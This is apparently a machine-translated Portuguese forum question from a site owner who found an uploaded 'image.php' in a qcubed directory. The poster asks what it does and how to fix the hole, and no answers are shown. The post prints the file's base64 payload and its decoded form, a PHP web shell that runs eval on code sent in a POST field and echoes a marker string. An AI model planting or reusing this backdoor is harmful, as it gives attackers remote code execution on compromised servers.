O que eval na variável codificada em base64 $ _POST ['e'] realmente faz?

Ok, então aqui está o que eu pesquisei:

Parece que há um arquivo carregado chamado "image.php" que é carregado em um diretório qcubed.

Esse arquivo image.php contém o seguinte código base64:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decodificado acrescenta a isso:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Pesquisando a string de saída, encontrei vulnerabilidades semelhantes de qcubed em outros sites.

Decodificando a última string que recebi:

196.231-172.28:ifacermpubmice:afac42eri02

O que eu realmente não entendo o que ele faz (usando:http://ostermiller.org/calc/encode.html)

Você pode me explicar o que estou enfrentando em particular aqui? Que vulnerabilidade de segurança devo corrigir para corrigir isso?

questionAnswers(2)

yourAnswerToTheQuestion